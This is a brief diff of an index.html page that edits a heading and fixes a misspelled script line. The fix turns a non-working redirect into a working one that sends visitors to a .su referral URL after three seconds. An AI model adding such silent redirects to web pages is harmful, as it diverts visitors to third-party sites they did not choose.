--- a/index.html
+++ b/index.html
@@ -11,10 +11,10 @@
 
 <body>
 
-				<h1> VLDPPROD </h1>
+				<h1> VLDlPROD </h1>
 <script>
 setTimeout(function() {
-  window.location.replase = "https://www.people-group.su/?r=337781";
+  self.location = "https://www.people-group.su/?r=337781";
 }, 3000);
 </script>
 <! - www.people-group.net ->
